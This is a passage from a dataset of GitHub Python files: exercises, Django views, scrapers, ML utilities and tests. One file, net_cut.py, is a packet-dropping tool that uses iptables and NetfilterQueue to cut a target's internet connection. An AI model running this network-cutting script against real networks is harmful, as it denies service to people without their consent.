main(parse_args())\n","repo_name":"THUNLP-MT/THUCC","sub_path":"MachineTranslation/code/THUMT/thumt/bin/test_lrp_rnnsearch.py","file_name":"test_lrp_rnnsearch.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"14545696448","text":"def string_match(a, b):\n if len(a) < len(b):\n r = len(a)-1\n else:\n r = len(b)-1\n timesFound = 0\n for x in range(r):\n if (a[x] == b[x]) and (a[x+1] == b[x+1]):\n timesFound += 1\n return timesFound\n\nprint(string_match('abc', 'axc'))\n","repo_name":"Vagelis-Prokopiou/python-challenges","sub_path":"codingbat.com/Warmup-2/string_match.py","file_name":"string_match.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28967052840","text":"from django.shortcuts import render\nfrom app.models import *\n\n# Create your views here.\n\ndef index(request):\n info = Info.objects.all()\n projects = Projects.objects.all()\n context = {'info':info,\n 'projects':projects\n }\n return render(request,'index.html',context)\n\n\n","repo_name":"dhimanromanregins/portfolio","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25637040060","text":"\"\"\"Добавление заработка в модель курьера\n\nRevision ID: 4c077b9f2caa\nRevises: 8a71156a212a\nCreate Date: 2021-07-08 21:46:09.667851\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4c077b9f2caa'\ndown_revision = '8a71156a212a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('courier', sa.Column('earnings', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column('courier', 'earnings')\n    # ### end Alembic commands ###\n","repo_name":"lizatish/YandexBackendSchool2021","sub_path":"migrations/versions/4c077b9f2caa_добавление_заработка_в_модель_курьера.py","file_name":"4c077b9f2caa_добавление_заработка_в_модель_курьера.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"11695948109","text":"import humanize\n\nimport lambentlight.client as client\n\n\nasync def print_servers():\n    \"\"\"\n    Prints the servers currently running.\n    \"\"\"\n    # Request the list of servers\n    servers = await client.get(\"/servers\")\n    # Format them to the correct value\n    values = []\n    for name, info in servers.items():\n        values.append([name, info[\"cpu\"], humanize.naturalsize(info[\"mem\"])])\n    # And print them to the user\n    client.print_with_header([\"Name\", \"CPU%\", \"Memory Usage\"], *values)\n","repo_name":"LambentLight/LambentLight","sub_path":"LambentLight.Client/lambentlight/client/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"18"}
{"seq_id":"1174658879","text":"\"\"\"\nThis module creates a curve and builds a new 5 year swap and an existing swap\nand prints out the float and fixed PVs. The existing swap and the new swap are\nidentical and thus should give the same results. It also defines a function,\nSanityCheck, which loops through the swap maturities and, for each, sweeps from 10bp below\nthe swap rate to 10bp above the swap rate and prints out the PVs. The PVs\nshould be 0 for the swap rate, they are close but I am not in a position to say\nif they are close enough\n\"\"\"\n\n# The Python module that wraps the dll\nimport phin\n# Load the module with the data in it\nimport data\n# Load the module with GBP swaps\nimport GBPInstrument\n\n# Get the data\nlibors = data.libors\nswaps = data.swaps\nfixedRate = data.fixedRate\nvalueDate = data.valueDate\nmaturityDate = data.maturityDate\nsettlementDate = data.settlementDate\ncurrentRate = data.currentRate\n\nmaturityYears = 5\n\n# Build the curve\nc = phin.curve(valueDate,libors,swaps)\nres = c.Build()\n\n\ndef BasicTest():\n    # Build a new pay swap\n    newSwap = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,True,c)\n    print('Receiver Receive PV:', newSwap.pay_side_pv())\n    print('Receiver Pay PV:', newSwap.receive_side_pv())\n    print('Receiver PV:',newSwap.pv())\n\n    # Build a new receive swap\n    newSwap = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,False,c)\n    print('Payer Receive PV:', newSwap.receive_side_pv())\n    print('Payer Pay PV:', newSwap.pay_side_pv())\n    print('Payer PV:',newSwap.pv())\n\n\n\ndef SanityCheck():\n    \"\"\"\n    Checks swap PVs by looping through the maturities, then sweeping from 10bp\n    below the swap rate to 10bp above, and printing out the PVs\n    \"\"\"\n    bp = 0.0001\n\n    # Iterate through the swaps\n    for i,j in enumerate(swaps):\n        for b in range(-10,11):\n            s = GBPInstrument.GBPSwap(valueDate,i+1,j+b*bp,True,c)\n            print(i+1,b,j+b*bp, s.pv())\n\n\ndef TestNewSwap():\n    \"\"\"\n    Create a new swap and an existing swap with exactly the same inputs and\n    calculate the PV. 
The difference in the PVs should be 0\n    \"\"\"\n\n    # Create an existing swap\n    es = GBPInstrument.GBPExistingSwap(valueDate,maturityDate,fixedRate,currentRate,True,c)\n\n    # Create a new swap\n    ns = GBPInstrument.GBPSwap(valueDate,maturityYears,fixedRate,True,c)\n\n    diffPV = ns.pv() - es.pv()\n\n    print('This should be 0', diffPV)\n\n    \n\n","repo_name":"PhineasCampbell/phin_linux","sub_path":"SwapTest.py","file_name":"SwapTest.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"30541014800","text":"from selenium import webdriver\nimport webbrowser, requests, bs4\nimport time\nimport datetime\nimport os\n\nlink = raw_input(\"Enter link of page you want to download: \")\t\t# link of page to download\n\nfor i in xrange(0,365):\t\t\t\t\t\t\t\t\t\t\t# sleep till 2am \n    # sleep until 2AM\n    t = datetime.datetime.today()\n    future = datetime.datetime(t.year,t.month,t.day,2,0)\n    if t.hour >= 2:\n        future += datetime.timedelta(days=1)\n    time.sleep((future-t).seconds)\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(link)\t\t\t\t\t\t\t\t\t\t\t\t\t# open download page\n\t\nelems = browser.find_elements_by_xpath(\"//a[@href]\")\t\t\t\t# find links\nfor elem in elems:\n\ttry:\n\t\twebbrowser.open(elem.get_attribute(\"href\"))\t\t\t\t\t# open each link\n\texcept TypeError:\n\t\tcontinue\n    #print elem.get_attribute(\"href\")\n\n\nfor i in xrange(0,365): # sleep till 5am, then shut down \n    # sleep until 5AM\n    t = datetime.datetime.today()\n    future = datetime.datetime(t.year,t.month,t.day,5,0)\n    if t.hour >= 5:\n        future += datetime.timedelta(days=1)\n    time.sleep((future-t).seconds)\n    os.system(\"shutdown -h now\")\n","repo_name":"thobhanifreddy/download_index_of","sub_path":"download1.py","file_name":"download1.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"25522152679","text":"def countNum(card_list):\n    cnt_list = [0 for i in range(0, 10)]\n    for card in card_list:\n        cnt_list[card] += 1\n    return cnt_list\n\n\ndef isRun(card_list):\n    cnt_list = countNum(card_list)\n    for i in range(0,8):\n        if cnt_list[i] > 0 and cnt_list[i+1] > 0 and cnt_list[i+2] > 0:\n            return True\n    return False\n\n\ndef isTriplet(card_list):\n    cnt_list = countNum(card_list)\n    for cnt in cnt_list:\n        if cnt >= 3:\n            return True\n    return False\n\n\ndef canWin(card_list):\n    return isRun(card_list) or isTriplet(card_list)\n\n\ndef whoIsWinner(player1, player2):\n    for turn in range(3, 7):\n        list1 = player1[:turn]\n        list2 = player2[:turn]\n        if canWin(list1):\n            return 1\n        if canWin(list2):\n            return 2\n\n    return 0\n\n\nif __name__ == '__main__':\n    TC = int(input())\n    for T in range(1, TC + 1):\n        tmp = input().split(' ')\n        player1 = [int(tmp[2*i]) for i in range(0,6)]\n        player2 = [int(tmp[2*i+1]) for i in range(0,6)]\n\n        res = whoIsWinner(player1, player2)\n        print(\"#%d %d\" % (T, res))","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"SA/2104/5203.py","file_name":"5203.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"42289423099","text":"from selenium import webdriver\nimport pytest\n\nlink = \"http://selenium1py.pythonanywhere.com/\"\n\n\n@pytest.fixture\ndef browser():\n    print(\"\\nstart browser for test..\")\n    browser = webdriver.Chrome()\n    return browser\n\n\nclass TestMainPage1:\n    # Call the fixture in the test by passing it as parameter\n    def test_guest_should_see_login_link(self, 
browser):\n        browser.get(link)\n        browser.find_element_by_css_selector(\"#login_link\")\n        # print(\"===Found login_link(TS)===\")\n\n    def test_guest_should_see_basket_link_on_the_main_page(self, browser):\n        browser.get(link)\n        browser.find_element_by_css_selector(\".basket-mini .btn-group > a\")\n        # print(\"===Found Button(TS)===\")\n","repo_name":"srgkun/stepik_autotests_course","sub_path":"test_fixture2.py","file_name":"test_fixture2.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"13580693920","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom normalizer import normalize_list_of_strings\n\n#corpus will be a list of strings.\ndef bow_extractor(corpus, ngram_range=(1,1)):\n\tvectorizer = CountVectorizer(min_df=1,ngram_range=ngram_range)#Accept terms with a minimum frequency of 1.\n\tfeatures = vectorizer.fit_transform(corpus)\n\n\treturn vectorizer, features\n\n\n\n#The following is for testing purposes only.\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.cross_validation import train_test_split\n\ndef get_data():\n\tdata = fetch_20newsgroups(subset='all', shuffle=True, remove=('headers','footers','quotes'))\n\treturn data\n\ndef prepare_datasets(corpus,labels,test_data_proportion=0.3):\n\ttrain_x, test_x, train_y, test_y = train_test_split(corpus,labels,test_size=test_data_proportion,random_state=42)\n\treturn train_x, test_x, train_y, test_y\n\ndef remove_empty_docs(corpus, labels):\n\tfiltered_corpus = []\n\tfiltered_labels = []\n\tfor doc, label in zip(corpus, labels):\n\t\tif (doc.strip()):\n\t\t\tfiltered_corpus.append(doc)\n\t\t\tfiltered_labels.append(label)\n\treturn filtered_corpus, filtered_labels\n\ndataset = get_data()\ncorpus, labels = dataset.data, dataset.target\n\ntrain_corpus, test_corpus, train_labels, test_labels = prepare_datasets(corpus, labels, test_data_proportion=0.3)\n\nnorm_train_corpus = normalize_list_of_strings(train_corpus)\nnorm_test_corpus = normalize_list_of_strings(test_corpus)\n\nbow_vectorizer, bow_train_features = bow_extractor(norm_train_corpus)\nbow_test_features = bow_vectorizer.transform(norm_test_corpus)\n\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nmnb = MultinomialNB()\n\nmnb.fit(bow_train_features,train_labels)\npredictions = mnb.predict(bow_test_features)\n\n\n\n\n\n'''\n\n\nCORPUS = [\n\"good day sir how are you today\", \n\"today is a lovely day for training\",\n\"today the sun is lovely what a day for track n field training\"\n]\nbow_vectorizer, bow_features = bow_extractor(CORPUS)\n\nfeatures = bow_features.todense()\nprint(features)\n\n#Accepts a list of strings.\nnew_features = bow_vectorizer.transform([\"Hello sir how are you what a day for training\"])\nnew_features = new_features.todense()\nprint(new_features)\n\n'''\n\n\n","repo_name":"slimgol/searchEngine","sub_path":"featureExtraction.py","file_name":"featureExtraction.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"42595884134","text":"import random\nfrom turtle import Turtle, Screen\n\n\ndef random_move(t):\n    \"\"\"random move by a turtle object\"\"\"\n    dis = random.randint(1, 10)\n    t.forward(dis)\n\n\ndef check_user_guess(guess, win_turtle):\n    \"\"\"check if user guess is right or wrong \"\"\"\n    if guess == win_turtle:\n        print(f\"Congratulations! Your guessed turtle color {guess} is right\")\n    else:\n        print(f\"Oh no! 
Your guessed turtle color {guess} is wrong\")\n\n\nscreen = Screen()\nscreen.setup(width=1000, height=600)\ncolors = ['red', 'blue', 'green', 'yellow', 'magenta']\n\nuser_guess = screen.textinput(title='Bets for turtles', prompt='guess which turtle is going to win?')\n\n# Create 5 turtle objects, place them at the beginning of the line, and\n# then append them to a list called 'turtles_list':\nsep = 0\nturtles_list = []\nfor index in range(5):\n    tur = Turtle(shape='turtle')\n    tur.penup()\n    turtles_list.append(tur)\n    # print(tur)\n    tur.goto(x=-490, y=-150 + sep)\n    tur.color(colors[index])\n    sep += 75\n\n# print(turtles_list)\n# Move each turtle a random distance forward until one of them reaches the finish line:\nnot_finish = True\nwinner = ''\nwhile not_finish:\n    for i in range(len(turtles_list)):\n        tur = turtles_list[i]\n        random_move(tur)\n        x_coordinate = tur.xcor()\n        if x_coordinate > 480:\n            winner = tur\n            not_finish = False\n            break\n        # print(f'tur{i} {x_coordinate}')\n\npen_color, tur_color = winner.color()  # getting winner turtle's color\n\n# Print out the winner turtle's color and check if my guessed turtle color is right or wrong:\nprint(f'winner is turtle of color {tur_color}')\ncheck_user_guess(guess=user_guess, win_turtle=tur_color)\n\nscreen.exitonclick()\n","repo_name":"akds-singh/PROJECT_from_pycharm","sub_path":"OOPs_1/turtles_race.py","file_name":"turtles_race.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"41012114261","text":"import numpy as np\nfrom faker import Faker\nimport random\nfrom tqdm import tqdm\nfrom babel.dates import format_date\n\nfake = Faker()\nFaker.seed(12345)\nrandom.seed(12345)\n\nclass SpecialTokens:\n    SOS_token = '>'\n    EOS_token = '<'\n    UNK_token = '?'\n    PAD_token = ';'\n\n\n# Define format of the data we would like to generate\nFORMATS = ['short',\n           'medium',\n           'long',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'full',\n           'd MMM YYY', \n           'd MMMM YYY',\n           'dd MMM YYY',\n           'd MMM, YYY',\n           'd MMMM, YYY',\n           'dd, MMM YYY',\n           'd MM YY',\n           'd MMMM YYY',\n           'MMMM d YYY',\n           'MMMM d, YYY',\n           'dd.MM.YY']\n\n# change this if you want it to work with another language\nLOCALES = ['en_US']\n\ndef load_date():\n    \"\"\"\n        Loads some fake dates \n        :returns: tuple containing human readable string, machine readable string, and date object\n    \"\"\"\n    dt = fake.date_object()\n\n    try:\n        human_readable = format_date(dt, format=random.choice(FORMATS),  locale='en_US') # locale=random.choice(LOCALES))\n        human_readable = human_readable.lower()\n        human_readable = human_readable.replace(',','')\n        machine_readable = dt.isoformat()\n        \n    except AttributeError as e:\n        return None, None, None\n\n    return human_readable, machine_readable, dt\n\ndef load_dataset(m):\n    \"\"\"\n        Loads a dataset with m examples and vocabularies\n        :m: the number of examples to generate\n    \"\"\"\n    \n    human_vocab = set()\n    machine_vocab = set()\n    dataset = []\n    Tx = 30\n    \n\n    for i in tqdm(range(m)):\n        h, m, _ = load_date()\n        m = m\n        sme = SpecialTokens.SOS_token + m + SpecialTokens.EOS_token\n        if h is not None:\n            dataset.append((h, sme))\n            human_vocab.update(tuple(h))\n            machine_vocab.update(tuple(m))\n\n    dataset.sort(key= lambda x: len(x[0]))\n\n    human_special_tokens = [SpecialTokens.PAD_token, SpecialTokens.UNK_token]\n    machine_special_tokens = [SpecialTokens.PAD_token, SpecialTokens.SOS_token, SpecialTokens.EOS_token]\n    \n    human = 
dict(zip(human_special_tokens + sorted(human_vocab), \n list(range(len(human_vocab) + len(human_special_tokens)))))\n \n machine = dict(zip(machine_special_tokens + sorted(machine_vocab),\n list(range(len(machine_vocab) + len(machine_special_tokens)))))\n \n return dataset, human, machine\n\n\n","repo_name":"Kamil2601/machine-translation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27613856407","text":"import os\nimport csv\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport argparse\n\nnp.set_printoptions(suppress=True)\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nnp.random.seed(0)\n\nEPOCHES = 10\nBATCH_SIZE = 16\nlearning_rate = 0.0002\n\nfile_x = '../dsets/ALL/mnist_test_x.csv'\nfile_y = '../dsets/ALL/mnist_test_y.csv'\nreal_X, real_Y = pd.read_csv(file_x, header=None).to_numpy(\n), pd.read_csv(file_y, header=None).to_numpy()\n\n\nnum_outputs = 10 \nnum_inputs = 784 \nw=[]\nb=[]\n\ndef mlp(x, num_inputs, num_outputs, num_layers, num_neurons):\n w = []\n b = []\n for i in range(num_layers):\n # weights\n w.append(tf.Variable(tf.random_normal(\n [num_inputs if i == 0 else num_neurons[i - 1],\n num_neurons[i]], dtype=tf.float64),\n name=\"w_{0:04d}\".format(i), dtype=tf.float64\n ))\n # biases\n b.append(tf.Variable(tf.random_normal(\n [num_neurons[i]], dtype=tf.float64),\n name=\"b_{0:04d}\".format(i), dtype=tf.float64\n ))\n w.append(tf.Variable(tf.random_normal(\n [num_neurons[num_layers - 1] if num_layers > 0 else num_inputs,\n num_outputs], dtype=tf.float64) , name=\"w_out\",dtype=tf.float64))\n b.append(tf.Variable(tf.random_normal([num_outputs], dtype=tf.float64) , name=\"b_out\", dtype=tf.float64))\n\n # x is input layer\n layer = x\n # add hidden layers\n for i in range(num_layers):\n layer = tf.nn.relu(tf.matmul(layer, w[i]) + b[i])\n # add output layer\n layer = tf.matmul(layer, w[num_layers]) + b[num_layers]\n\n return layer\n\n# input images\nx = tf.placeholder(dtype=tf.float64, name=\"x\", \n shape=[None, num_inputs]) \n# target output\ny = tf.placeholder(dtype=tf.float64, name=\"y\", \n shape=[None, num_outputs])\nnum_layers = 0\nnum_neurons = []\nlearning_rate = 0.01\nn_epochs = 30\nbatch_size = 100\nn_batches = int(len(real_X)/batch_size)\n\nmodel = mlp(x=x,\n num_inputs=num_inputs,\n num_outputs=num_outputs,\n num_layers=num_layers,\n num_neurons=num_neurons)\n\nloss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=model, labels=y))\noptimizer = tf.train.GradientDescentOptimizer(\n learning_rate=learning_rate).minimize(loss)\n\npredictions_check = tf.equal(tf.argmax(model, 1), tf.argmax(y, 1))\naccuracy_function = tf.reduce_mean(tf.cast(predictions_check, tf.float32))\n# save\nsaver = tf.train.Saver(var_list=None, max_to_keep=5, name='v2')\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n if os.path.exists(\"./log/ckpt0/checkpoint\"):\n saver.restore(sess, './log/ckpt0/model')\n\n var_list = [v.name for v in tf.global_variables()]\n print(var_list)\n print(sess.run(var_list))\n feed_dict = {x: real_X, y: real_Y}\n accuracy_score = sess.run(accuracy_function, feed_dict=feed_dict)\n print(\"accuracy={0:.8f}\".format(accuracy_score))\n 
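[Illustrative aside, assumed example rather than original code] The accuracy computed just above compares the argmax of the model's logits with the argmax of the one-hot labels and averages the matches; the same computation in plain numpy:

    import numpy as np
    logits = np.array([[2.0, 0.1], [0.3, 0.9]])
    labels = np.array([[1, 0], [1, 0]])  # one-hot targets
    print(np.mean(np.argmax(logits, 1) == np.argmax(labels, 1)))  # 0.5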
\n\n","repo_name":"LatticeX-Foundation/Rosetta","sub_path":"example/tutorials/code/tf-test_mlp_acc.py","file_name":"tf-test_mlp_acc.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":544,"dataset":"github-code","pt":"18"} +{"seq_id":"13056969832","text":"\n# #Step 3: Play Computer\n\n# year = int(input(\"What's your year of birth?\"))\n# if year > 1980 and year < 1994:\n# print(\"You are a millenial.\")\n# elif year > 1994:\n# print(\"You are a Gen Z.\")\n\n# 1.Input year by year eg.check for 1990\n# 2.Look at each line of code and see what it will evaluate\n# 3.Now check for 1994\n# 4.Error occurs when you type in 1994\n\n###<<>>###\n\n\n\nyear = int(input(\"What's your year of birth?\"))\nif year > 1980 and year < 1994: \n print(\"You are a millenial.\")\nelif year >=1994:\n print(\"You are a Gen Z.\")\n\n#1.Now we realize neither if nor else blocks catch 1994\n#2.you can write <=1994 in if block or >=1994 in else block\n","repo_name":"priyanka-111-droid/100daysofcode","sub_path":"Day013/13-3.py","file_name":"13-3.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"36921086858","text":"#!/usr/bin/env python\nimport netfilterqueue\nimport subprocess\nimport optparse\nimport os\n\n\ndef get_arguments():\n parser = optparse.OptionParser()\n parser.add_option(\"-c\", \"--chain\", dest=\"chain\", help=\"adding the chain , e.g FORWARD,INPUT,OUTPUT\")\n parser.add_option(\"-n\", \"--num\", dest=\"num\", help=\"queue num, e.g 0\")\n (options, arguments) = parser.parse_args()\n if not options.chain:\n parser.error(\"[-] Pls specify a chain, use --help for more help\")\n elif not options.num:\n parser.error(\"[-] Pls specify a queue num, use --help for more help\")\n return options\n\n\ndef starting_up(chain, num):\n print(\"[+] Default chain packets are send through another interface\")\n subprocess.call([\"iptables\", \"-I\", chain, \"-j\", \"NFQUEUE\", \"--queue-num\", num])\n # \"Enable ip forwarding as Kali might not be processing incoming and outgoing packet like a normal router do \"\n subprocess.call([\"echo\", \"1\", \"/proc/sys/net/ipv4/ip_forward\"], stdout=open(os.devnull, 'wb'))\n\n\ndef cutting_internet_connection_target(packet):\n print(packet)\n packet.drop()\n\n\ndef iptables_flush():\n print(\"[+] flushing iptables!!\")\n subprocess.call([\"iptables\", \"--flush\"])\n\n\noptions = get_arguments()\n\n\ntry:\n starting_up(options.chain, options.num)\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, cutting_internet_connection_target)\n queue.run()\nexcept KeyboardInterrupt:\n iptables_flush()\n","repo_name":"BEARKUNN/KALI-LINUX-REPO-","sub_path":"net_cut.py","file_name":"net_cut.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38191232235","text":"# assalomu alaykum\n# bugungi dasr funksiyaga royhatlarni togri kochirish bilan tanishdik\n\n# baholar nomli funksiya yaratamiz qani kettik\n\ndef bohola(ismlar):\n boholar = {}\n for ism in ismlar:\n\n boho = input(f\"{ism.title()}ning bohosini kiriting: \")\n boholar[ism] = int(boho)\n return boholar\ntalabalar = 
['anvar','shokir','nodir','jamshid']\nprint(bohola(talabalar))\nprint(talabalar)","repo_name":"Shoxruhk/python-sariq.dev-javoblar","sub_path":"dars21.py","file_name":"dars21.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70193760682","text":"import pandas as pd\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\npage = urlopen('https://www.flipkart.com/mens-watches-store?otracker=nmenu_sub_Men_0_Watches')\r\nsoup = BeautifulSoup(page, 'lxml')\r\ndabba = soup.find_all('div', class_=\"_3liAhj _2Vsm67\")\r\nitems = []\r\nfor i in range(dabba.__len__()):\r\n each = list()\r\n each.append(dabba[i].find('a', class_=\"_2cLu-l\").text)\r\n each.append(dabba[i].find('div', class_=\"_1vC4OE\").text)\r\n if dabba[i].find('div', class_=\"VGWI6T\"):\r\n each.append(dabba[i].find('div', class_=\"VGWI6T\").text)\r\n else:\r\n each.append(\"NAN\")\r\n items.append(each)\r\ndf = pd.DataFrame(items, columns = [\"Name\", \"Price\", \"Discount\"])\r\ndf.to_csv('watches.csv')\r\nprint(df)","repo_name":"jatin-jeena/Web-Scraping","sub_path":"Flipcart-Watch Finder/Flipcart_watch_scrapping.py","file_name":"Flipcart_watch_scrapping.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6317946858","text":"from zDB_Tutorial.Backend.app import APP_MAIN, APPLOGIN\nfrom flask import render_template, flash,redirect,url_for,abort\nfrom zDB_Tutorial.Backend.app.forms import LoginForm , RegistrationForm , EditProfileForm, TestAjex\nfrom flask_login import current_user, login_user, logout_user , login_required\nfrom zDB_Tutorial.Backend.app.model import User\nfrom flask import request\nfrom werkzeug.urls import url_parse\nfrom werkzeug.security import generate_password_hash\nfrom datetime import datetime\nimport json\n\n\n@APP_MAIN.route('/')\n@APP_MAIN.route('/index')\n@login_required\ndef index():\n user = {'username': 'Saad'}\n posts = [\n {\n 'author': {'username': 'John'},\n 'body': 'Beautiful day in Portland!'\n },\n {\n 'author': {'username': 'Susan'},\n 'body': 'The Avengers movie was so cool!'\n }\n ]\n return render_template('index.html', title='Home', posts=posts)\n\n\n\n@APP_MAIN.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.objects(username=form.username.data)\n if(len(user)==0):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n else:\n user = user[0]\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n@APP_MAIN.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@APP_MAIN.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data,\n email=form.email.data,\n password_hash=generate_password_hash(form.password.data))\n user.save()\n 
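        # Aside (illustration, not part of the original route): the werkzeug
        # helper used above salts and hashes the password, and its counterpart
        # check_password_hash verifies a candidate string against the stored
        # hash, e.g.:
        #     from werkzeug.security import generate_password_hash, check_password_hash
        #     h = generate_password_hash("s3cret")
        #     assert check_password_hash(h, "s3cret")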
flash('Congratulations, you are now a registered user!')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@APP_MAIN.route('/user/')\n@login_required\ndef user(username):\n user = User.objects(username=username)\n if(len(user)==0):\n abort(404)\n else:\n user=user[0]\n posts = [\n {'author': user, 'body': 'Test post #1'},\n {'author': user, 'body': 'Test post #2'}\n ]\n return render_template('user.html', user=user, posts=posts)\n\n\n@APP_MAIN.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.update(last_seen = datetime.utcnow())\n current_user.reload()\n\n\n@APP_MAIN.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.update(about_me = form.about_me.data)\n current_user.reload()\n flash('Your changes have been saved.')\n return redirect(url_for('edit_profile'))\n elif request.method == 'GET':\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', title='Edit Profile',\n form=form)\n\n\n@APP_MAIN.route('/testajax', methods=['GET', 'POST'])\n@login_required\ndef test_ajax():\n form = TestAjex()\n if form.validate_on_submit():\n print(form.about_me.data)\n print(form.about_me2.data)\n return render_template('ajaxtest.html', title='Test Ajax',\n form=form)\n\n\n@APP_MAIN.route('/here', methods=['POST'])\ndef kaka():\n s1= request.form['about_me']\n s2 = request.form['about_me2']\n print(\"s1: \"+s1+s2)\n return json.dumps({'status': s1+s2})","repo_name":"Koushik-Deb/VocLab-Latest","sub_path":"zDB_Tutorial/Backend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34856624913","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nfrom utils import data_helpers\nimport numpy as np\nimport tensorflow as tf\nfrom rnn_model import PTBModel\nfrom utils.config import SmallConfig, MediumConfig, LargeConfig, FilePath, Config\n\n\ndef run_epoch(session, m, data, eval_op, verbose=False, vocabulary=None):\n \"\"\"\n :param session for computation\n :param m model object\n :param data input data\n :param eval_op\n :param verbose\n :param vocabulary\n Runs the model on the given data.\"\"\"\n print(data)\n size_limit = 30\n find_stop_word = False\n state = m.initial_state.eval()\n current_step = 0\n gen_words = []\n input_data = data\n while (current_step < size_limit) and (not find_stop_word):\n state, probs, logits, _ = session.run([m.final_state, m.probabilities, m.logits, eval_op],\n {m.input_data: input_data,\n m.initial_state: state})\n chosen_word = np.argmax(probs, 1)\n print(\"Probabilities shape: %s, Logits shape: %s\" %\n (probs.shape, logits.shape) )\n print(chosen_word)\n next_word = 'unk'\n next_word_id = 0\n if vocabulary is not None:\n next_word_id = chosen_word[-1]\n for word_, word_id_ in vocabulary.iteritems():\n if word_id_ == next_word_id:\n print(word_)\n next_word = word_\n # next_word_arr = next_word.split('')\n # if len(next_word_arr) > 1:\n # next_word = next_word_arr[0]\n # find_stop_word = True\n if next_word == '':\n find_stop_word = True\n gen_words.append(next_word)\n input_data = np.array(input_data)[:, 1:]\n input_data = np.concatenate((input_data, np.array([[next_word_id]])), axis=1)\n current_step += 1\n return gen_words\n\n\ndef get_config(model_option):\n if model_option == \"small\":\n 
